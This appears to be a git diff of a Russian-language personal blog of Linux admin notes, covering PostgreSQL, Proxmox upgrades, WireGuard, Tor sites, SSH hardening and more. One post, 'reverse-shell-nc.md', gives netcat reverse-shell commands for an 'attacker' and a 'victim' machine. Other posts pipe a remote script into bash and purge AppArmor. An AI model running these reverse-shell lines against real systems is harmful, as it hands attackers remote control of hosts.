 ssl_cert_file = '<cert>.pem'
 ssl_key_file = '<key>.pem'
@@ -21,12 +23,14 @@ listen_addresses = 'localhost, <master-ip>'
 ```
 
 ## Разрешение доступа через TLS
+
 В файл `/var/lib/pgpro/std-*/data/pg_hba.conf` необходимо добавить следующие строки:
-```config
+```python
 hostssl <user> <database> <client-ip> scram-sha-256
 ```
 
 ## (ре)Генерация пароля
+
 В случае, если до этого хеш-алгоритм пароля был не scram-sha-256, то необходимо пересоздать пароль:
 ```shell
 psql -c \password

content/posts/postgres-update.md

@@ -6,7 +6,7 @@ tags: [linux, postgres]
 ---
 
 ## Листинг запущенных экземпляров PostgreSQL
-```shell
+```bash
 pg_lsclusters
 ```
 

content/posts/psql-to-csv.md

@@ -0,0 +1,20 @@
+---
+title: Конвертация PostgreSQL в CSV
+description: pSQL to CSV
+date: 2024-09-11T17:24:00+02:00
+tags: [linux, postgres]
+---
+## Конвертация
+```bash
+psql -d <database>
+```
+```psql
+DO $$
+DECLARE
+    r RECORD;
+BEGIN
+    FOR r IN (SELECT table_name FROM information_schema.tables WHERE table_schema = 'public') LOOP
+        EXECUTE format('COPY %I TO %L WITH (FORMAT CSV, HEADER)', r.table_name, '/<path-to-csv>/' || r.table_name || '.csv');
+    END LOOP;
+END $$;
+```

content/posts/pve-update.md

@@ -0,0 +1,52 @@
+---
+title: Обновление Proxmox 7 -> Proxmox 8
+description: И дошлифовка
+date: 2024-12-10T14:05:00+01:00
+tags: [linux]
+---
+
+## Актуализация ОС
+
+```shell
+apt -y update
+apt -y dist-upgrade
+```
+
+## Проверка готовности обновления
+
+```shell
+pve7to8 --full
+```
+
+## Актуализация репозиториев
+
+```shell
+sed -i 's/bullseye/bookworm/g' /etc/apt/sources.list
+sed -i 's/bullseye/bookworm/g' /etc/apt/sources.list.d/*.list
+```
+
+## Обновление ОС и PVE
+
+```shell
+apt -y update
+apt -y dist-upgrade
+init 6
+```
+
+## Дошлифовка
+
+```shell
+bash -c "$(wget -qLO - https://github.com/community-scripts/ProxmoxVE/raw/main/misc/post-pve-install.sh)"
+```
+
+## Ограничение потребление RAM zfs'ом
+В `/etc/modprobe.d/zfs.conf` добавить следующую строку (2GB на 1TB):
+```python
+options zfs zfs_arc_max=4294967296
+```
+
+Применение и перезагрузка
+```shell
+update-initramfs -u -k all
+init 6
+```

content/posts/rdg-from-linux.md

@@ -6,6 +6,7 @@ tags: [linux, windows]
 ---
 
 ## Подключение
+
 Если используешь иксы, то вместо `wlfreerdp` пиши `xfreerdp`:
 ```bash
 wlfreerdp /gu:<username> /u:<username> /gp:<password> /p:<password> /v:<vm-fqdn> /g:<rdg-fqdn> /sound /microphone:sys:alsa,dev:hw:0,0 /f

content/posts/reverse-shell-nc.md

@@ -4,16 +4,19 @@ description: Используя Traditional и OpenBSD Netcat
 date: 2022-12-09T15:02:00+05:00
 tags: [linux, ssh, hack]
 ---
+
 ## Машина атакующего
 ```shell
 nc -lvp <port>
 ```
 ## Машина жертвы (Traditional Netcat)
+
 ```shell
 nc <attacker-ip> <port> -e /bin/bash
 ```
 
 ## Машина жертвы (OpenBSD Netcat)
+
 ```shell
 mkfifo /tmp/rev; nc <attacker-ip> <port> < /tmp/rev | /bin/bash 2>&1 | tee /tmp/rev > /dev/null
 ```

content/posts/rhel-setup.md

@@ -0,0 +1,35 @@
+---
+title: Активация и автоматические обновления в RHEL 9
+description: Небольшая памятка
+date: 2025-02-27T23:10:00+01:00
+tags: [linux, rhel]
+---
+
+## Активация
+
+```shell
+subscription-manager register --auto-attach
+insights-client --register
+```
+
+## Автоматическая установка обновлений
+
+```shell
+yum -y install dnf-automatic
+systemctl enable --now dnf-automatic-install.timer
+```
+
+## Установка расширенного репозитория
+
+```shell
+subscription-manager repos --enable codeready-builder-for-rhel-9-$(arch)-rpms
+yum -y install https://dl.fedoraproject.org/pub/epel/epel-release-latest-9.noarch.rpm
+```
+
+## Отключение дампов ядра
+
+```shell
+systemctl disable --now kdump
+grubby --update-kernel=ALL --remove-args="crashkernel"
+init 6
+```

content/posts/ruby-packer.md

@@ -65,7 +65,7 @@ chmod +x /usr/local/bin/rubyc
 ## Правка запускаемого файла собираемой утилиты
 
 В запускаемый файл `exe/<ruby-util>` (обычно лежит в exe или bin) необходимо добавить в самое начало следующие строки:
-```config
+```python
 #!/usr/bin/env ruby
 
 require 'rubygems'
@@ -83,7 +83,7 @@ bundle exec rake install
 
 ## Сборка бинарника
 
-Собираем бинарник. Обязательно при этом необходимо молиться.
+Собираем бинарник и молимся.
 ```shell
 cd <ruby-util-dir>
 rubyc -r . -d /tmp/ -o <ruby-util> exe/<ruby-util>

content/posts/selfsigned-to-trusted.md

@@ -5,18 +5,21 @@ date: 2023-05-12T18:20:00+05:00
 tags: [linux, astra, alt, tls]
 ---
 ## Получение корневого сертификата
-```shell
+
-echo quit | openssl s_client -showcerts -servername <websi.te> -connect <websi.te>:443 > <certificate>.pem
+```bash
+echo quit | openssl s_client -showcerts -servername <websi.te> -connect <websi.te>:443 > <certificate>.crt
 ```
 
 ## Astra Linux
 
 ### Перемещение сертификата
+
 ```shell
-cp <certificate>.pem /usr/local/share/ca-certificates
+cp <certificate>.crt /usr/local/share/ca-certificates
 ```
 
 ### Обновление состава доверенного хранилища 
+
 ```shell
 dpkg-reconfigure ca-certificates
 ```
@@ -24,11 +27,13 @@ dpkg-reconfigure ca-certificates
 ## Alt Linux
 
 ### Перемещение сертификата
+
 ```shell
-cp <certificate>.pem /etc/pki/ca-trust/source/anchors/
+cp <certificate>.crt /etc/pki/ca-trust/source/anchors/
 ```
 
 ### Обновление состава доверенного хранилища 
+
 ```shell
 update-ca-trust enable
 update-ca-trust extract

content/posts/ssh-2fa-totp.md

@@ -5,22 +5,23 @@ date: 2022-11-29T13:35:00+05:00
 tags: [linux, ssh]
 ---
 ## Установка пакета
+
 ```shell
 apt install -y openssh-server libpam-google-authenticator
 ```
 
 ## Правка конфига PAM
-```shell
-auth required pam_google_authenticator.so
 
-# auth required pam_google_authenticator.so
+В файл `/etc/pam.d/common-auth` необходимо добавить следующее:
+```python
+auth required pam_google_authenticator.so
 ```
 
 ## Правка конфига ssh
-```config
-ChallengeResponseAuthentication yes
 
-# /etc/ssh/sshd_config
+В файл `/etc/ssh/sshd_config` необходимо добавить следующее:
+```python
+ChallengeResponseAuthentication yes
 ```
 
 ## Конфигурация аутентификации
@@ -32,18 +33,14 @@ google-authenticator
 ```
 
 ## Управление факторами (необязательно)
-Включить запрос ключа при аутентификации:
+Для запроса ключа при аутентификации необходимо в файл `/etc/ssh/sshd_config` добавить следующее:
-```config
+```python
 AuthenticationMethods publickey,password publickey,keyboard-interactive
-
-# /etc/ssh/sshd_config
 ```
 
-Отключить запрос пароля при аутентификации:
+Для отключения запроса пароля при аутентификации необходимо в файле `/etc/pam.d/sshd` закомментировать следующюю строку:
-```config
+```python
-#@include common-auth
+# @include common-auth
-
-# /etc/pam.d/sshd
 ```
 
 ## Перезапуск сервиса ssh

content/posts/ssh-fail2ban.md

@@ -10,7 +10,8 @@ apt -y install fail2ban
 ```
 
 ## Правило для ssh
-```config
+В файл `/etc/fail2ban/jail.d/sshd.conf` необходимо добавить следующее:
+```python
 [sshd]
 enabled  = true
 port     = <ssh-port>
@@ -19,8 +20,6 @@ logpath  = /var/log/auth.log
 maxretry = 3
 findtime = 300
 bantime  = 3600
-
-# /etc/fail2ban/jail.d/sshd.conf
 ```
 
 ## Перезапуск сервиса fail2ban

content/posts/sshfs-fstab.md

@@ -0,0 +1,24 @@
+---
+title: Автомонтирование SSHFS
+description: SSHFS + fstab
+date: 2024-09-19T13:28:00+02:00
+tags: [linux, ssh]
+---
+
+## Установка пакета на клиенте
+
+```shell
+apt -y install sshfs
+```
+
+## Добавление строки в /etc/fstab
+
+```python
+<user>@<server-fqdn>:<remote-dir> <local-dir> sshfs allow_other,reconnect 0 
+```
+
+## Проверка монтирования
+
+```shell
+mount -a
+```

content/posts/swap-create.md

@@ -0,0 +1,31 @@
+---
+title: Создание SWAP-файла
+description: Файл подкачки в GNU/Linux
+date: 2025-01-12T22:10:00+01:00
+tags: [linux]
+---
+## Создания
+Размер файла подкачки
+
+RAM `<= 2GB`, SWAP `x2`\
+RAM `2GB - 8GB`, SWAP `x1`\
+RAM `>= 8GB`, SWAP `>= 4GB`
+
+```shell
+fallocate -l <size-in-gb>G /swap
+chmod 600 /swap
+mkswap /swap
+swapon /swap
+```
+
+## Автомонтирование
+
+В конец `/etc/fstab` необходимо добавить следующую строку
+```python
+/swap none swap sw 0 0
+```
+
+И проверим корректность записи
+```shell
+mount -a
+```

content/posts/tor-website.md

@@ -0,0 +1,63 @@
+---
+title: Поднятие сайта в TOR
+description: Caddy + torrc
+date: 2025-06-25T14:02:00+02:00
+tags: [linux, tor, caddy]
+---
+## Генерация vanity адреса
+
+```bash
+docker run -it nwtgck/mkp224o
+mkp224o <domain-start-with> -s
+```
+
+Формула для вычисления ожидаемого времени генерации:
+```python
+32^<number-of-characters>/<calc/sec> = <eta-in-seconds>
+```
+
+## Установка и конфигурация TOR
+
+Установка TOR:
+
+```shell
+apt -y install tor
+```
+
+Следующие строки необходимо добавить в `/etc/tor/torrc`:
+
+```python
+HiddenServiceDir /var/lib/tor/website
+HiddenServicePort 80 127.0.0.1:80
+```
+
+Файлы, сгенерированные `mkp224o`, необходимо добавить в директорию `/var/lib/tor/website`:
+
+```shell
+mkdir /var/lib/tor/website
+mv <domain>.onion/* /var/lib/tor/website
+chown -R debian-tor: /var/lib/tor/website
+chmod -R 700 /var/lib/tor/website
+```
+
+## Конфигурация Caddy
+
+В `Caddyfile` необходимо добавить следующее:
+
+```python
+<cleanet-doma.in> {
+	header Onion-Location http://<domain>.onion{uri}
+	respond "cleanet"
+}
+														
+http://<domain>.onion {
+	respond "onion"
+}
+```
+
+## Перезапуск сервисов
+
+```shell
+systemctl restart tor
+systemctl restart caddy
+```

content/posts/touchid-vw-linux.md

@@ -50,7 +50,7 @@ secret-tool store --label "com.quexten.bitwarden-biometrics-handler" account <us
 ## Правка конфига Firefox
 Необходимо создать файл `~/.mozilla/native-messaging-hosts/com.8bit.bitwarden.json` со следующим содержимым:
 
-```config
+```python
 {
     "name": "com.8bit.bitwarden",
     "description": "Bitwarden desktop <-> browser bridge",

content/posts/typing-emulate.md

@@ -0,0 +1,32 @@
+---
+title: Эмуляция ввода текста из буфера обмена
+description: Для GNU/Linux
+date: 2024-10-24T17:07:00+02:00
+tags: [linux]
+---
+## Установка и удаление пакетов
+
+```shell
+dnf install xclip xdotool
+rpm --nodeps -e xdg-desktop-portal-gnome
+```
+
+## Создание исполняемого файла
+
+В файл `/usr/local/bin/easyclipboard` необходимо добавить следующее:
+
+```json
+#!/bin/bash
+xclip -selection clipboard -out | tr \\n \\r | xdotool selectwindow windowfocus type --clearmodifiers --delay 25 --window %@ --file -
+```
+
+## Выдача прав на исполнение
+
+```shell
+chmod +x /usr/local/bin/easyclipboard
+```
+
+## ShortCut
+
+Далее необходимо забиндить исполняемый файл на какой-нибудь shortcut (например, `Ctrl+E`) и можно пользоваться.
+При нажатии комбинации клавиш текст из буфера обмена вводится по-буквенно (очень помогает с vnc/crd и подобным).

content/posts/ubuntu-apparmor-disable.md

@@ -0,0 +1,29 @@
+---
+title: Отключение AppArmor в Ubuntu 24.04
+description: purge apparmor
+date: 2024-10-09T10:51:00+02:00
+tags: [linux, security]
+---
+## Выключение сервиса
+
+```shell
+systemctl disable --now apparmor
+```
+
+## Удаление AppArmor
+
+```shell
+apt remove --assume-yes --purge apparmor
+```
+
+## Перезагрузка
+
+```shell
+init 6
+```
+
+## Одной командой
+
+```shell
+systemctl disable --now apparmor && apt remove --assume-yes --purge apparmor && init 6
+```

content/posts/vmware-clipboard.md

@@ -4,11 +4,13 @@ description: У созданных VM будет включен буфер об
 date: 2022-11-25T15:08:00+05:00
 tags: [vmware]
 ---
+
 ## Изменение конфига
-```config
+
+В файл `/etc/vmware/config` необходимо добавить следующее:
+
+```python
 vmx.fullpath = "/bin/vmx"
 isolation.tools.copy.disable="FALSE"
 isolation.tools.paste.disable="FALSE"
-
-# /etc/vmware/config
 ```

content/posts/vmware-restart-date.md

@@ -4,11 +4,14 @@ description: При перезагрузке гипервизора будет
 date: 2022-11-25T15:18:00+05:00
 tags: [vmware]
 ---
+
 ## Изменение скрипта
-```config
+
+В файл `/etc/rc.local.d/local.sh` необходимо добавить следующее:
+
+```python
 #!/bin/sh ++group=host/vim/vmvisor/boot
+
 esxcli system time set --day=20 --month=3 --year=2022 --hour=10 --min=0 --sec=0
 exit 0
-
-# /etc/rc.local.d/local.sh
 ```

content/posts/wg.md

@@ -0,0 +1,72 @@
+---
+title: WireGuard. Установка и настройка
+description: Сервер и клиент
+date: 2024-06-05T17:37:00+06:00
+tags: [linux, wireguard]
+---
+## Подготовка
+На сервере и клиенте необходимо установить пакет `wireguard` и сгенерировать публичный и приватный ключи:
+```shell
+apt install wireguard
+```
+```bash
+cd /etc/wireguard
+wg genkey | tee privatekey | wg pubkey > publickey
+```
+
+## Конфигурация сервера
+### Форвардинг пакетов
+В файл `/etc/sysctl.conf` необходимо добавить следующие строки:
+```python
+net.ipv4.ip_forward=1
+net.ipv6.conf.all.forwarding=1
+```
+И подгрузить эти значения командой `sysctl -p`
+
+### Конфигурация WireGuard
+В файл `/etc/wireguard/<conn-name>.conf` необходимо дописать следующее:
+```python
+[Interface]
+PrivateKey = <private-key>
+Address = 172.0.0.1/24
+PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o <interface> -j MASQUERADE
+PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o <interface> -j MASQUERADE
+ListenPort = 51820
+
+[Peer]
+PublicKey = <public-key>
+AllowedIPs = 172.0.0.2/32
+```
+`<public-key>` - содержимое файла `/etc/wireguard/publickey` клиента\
+`<private-key>` - содержимое файла `/etc/wireguard/privatekey` сервера\
+`<interface>` - имя сетевого интерфейса
+### Включение WireGuard при запуске сервера
+```shell
+systemctl enable --now wg-quick@<conn-name>.service
+```
+
+## Конфигурация клиента
+### Конфигурация WireGuard
+В файл `/etc/wireguard/<conn-name>.conf` необходимо дописать следующее:
+```python
+[Interface]
+Address = 172.0.0.2/32
+PrivateKey = <private-key>
+DNS = 1.1.1.1
+
+[Peer]
+PublicKey = <public-key>
+Endpoint = <server-addr>:51820
+AllowedIPs = <allowed-ips>
+```
+`<public-key>` - содержимое файла `/etc/wireguard/publickey` сервера\
+`<private-key>` - содержимое файла `/etc/wireguard/privatekey` клиента\
+`<server-addr>` - публичный адрес сервера\
+`<allowed-ips>` - IP-адреса, соединения с которыми будут идти через `WireGuard`
+### Включение WireGuard при запуске клиента
+```shell
+systemctl enable --now wg-quick@<conn-name>.service
+```
+
+## Примечание
+На сервере должен быть открыт порт `51820/udp`. Для добавления новых клиентов `WireGuard` необходимо в конфигурацию сервера добавлять блоки `[Peer]`.

content/posts/windows-disable-shutdown.md

@@ -4,12 +4,12 @@ description: Позволяет отключить определённую фу
 date: 2023-04-06T12:15:00+05:00
 tags: [windows]
 ---
+
 ## Отключение
 В ветке реестра выставить значение value на 1.
-```config
+
+```python
 Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown
 Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart
 Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep
-
-# regedit
 ```

layouts/partials/subtitle.html

@@ -1,6 +1,7 @@
-<pre><ascii> _._     _,-'""`-._
+<pre><ascii> ▄ .▄▄▄▄ .▄▄▌  ▄▄▌   there
-(,-.`._,'(       |\`-/|
+██▪▐█▀▄.▀·██•  ██•  ▪     
-    `-.-' \ )-`( , o o)
+██▀▐█▐▀▀▪▄██▪  ██▪   ▄█▀▄ 
-          `-    \`_`"'-</ascii>
+██▌▐▀▐█▄▄▌▐█▌▐▌▐█▌▐▌▐█▌.▐▌
+▀▀▀ · ▀▀▀ .▀▀▀ .▀▀▀  ▀█▄▀▪</ascii>
     
 <a href="//github.com/fruworg/fruworg.github.io">opensource, js&cookie free</a></pre>

static/id_rsa.pub

@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnVogG3iyXtY4dvLmmAwDAJRzTzfuUeP0LcD0zRrua8YOBKcSXyAh2Z/VSlwZeJOa9vcKDWJ+bWS9mq4WtL1nMTwbzZBp64wuuucq9ANpBzeS3WawY7DBU/qt5GjlBRI+tohZUVUOx35Q7WMjmAoopr6upLDq9zm6imTj6KGhEdeTDmn7dnhSaPAxqFbO4mlzqAZ6PUvjUyk119C4V5hp3wRjP6KXRIsPVpEKFXnJ26WubOg2qyoSr2UYQa3O9L0iaxUwMLg7s9eauGs2PIcqtUmu2UfNihKrBbmgvA/4wg0/odbMnbMXtCIeBWkuTBOfUzmH8FAEIKUTkl7nJvVj+0VNwRbIj8Nb85u0lex9rBZSOzoGd8tylly9t2Db5uT8paGFTlUAwVLns810V0b9tkXG0CpaH7ZNLOkTv7ISYIykED+Kb/ap4DfzauPAdraUmIWunr8l+Rvba16XqKZy7IEVKZsPF6XfK1Lywi65q9E6JDZ4ozAlIV8l73FWGHps=